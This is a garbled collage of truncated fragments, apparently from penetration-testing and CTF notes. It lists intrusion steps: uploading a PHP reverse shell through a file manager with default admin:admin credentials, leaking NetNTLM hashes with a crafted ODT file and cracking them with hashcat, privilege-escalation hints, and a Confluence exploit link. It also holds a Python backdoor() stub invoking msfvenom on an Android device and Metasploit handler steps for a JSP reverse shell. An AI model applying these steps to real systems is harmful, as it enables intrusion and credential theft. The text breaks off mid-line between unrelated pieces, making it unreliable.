-
Keypoints:
- /site: 301 in FFUF/feroxbuster result but actually we can access it
- allow_url_fopen, allow_url_include, LFI, RFI
- [PE]replace exe under backup dir.
-
Keypoints:
- wpscan didn't give useful info
- FFUF find /filemanager path, access with admin:admin, upload a reverse shell php file and find dora credentials info
- [PE] disk group
-
#TODO
def backdoor():
    global device
    if device != 'none':
        if shutil.which("msfvenom") is not None:
            try:
                d = adbutils.adb.device(device)
                …
-
Keypoints:
- Made a bad ODT file to leak NetNTLM Creds (https://github.com/rmdavy/badodf/blob/master/badodt.py) and impacket-smbserver can receive NetNTLM hash info --> Use `hashcat -m 5600` or j…
-
Keypoints:
- Atlassian Confluence 7.13.6 ---> https://github.com/jbaines-r7/through_the_wire (https://github.com/advisories/GHSA-653m-wpjp-54c4)
- [PE]pspy64
-
## Steps to reproduce
How'd you do it?
Set up the 'sploit handler:
1. use exploit/multi/handler
2. set PAYLOAD java/jsp_shell_reverse_tcp
2. set LHOST my.host
3. set ExitOnSession false
4…
-
any suggestions on how to fix this?
-
## Transfer Files
Using living off the land techniques after successfully exploiting the webapp vuln. I am aware of the two flags `--file-write` and `--file-read`. But it's just nice to have in cas…
-
make it more like a real tty?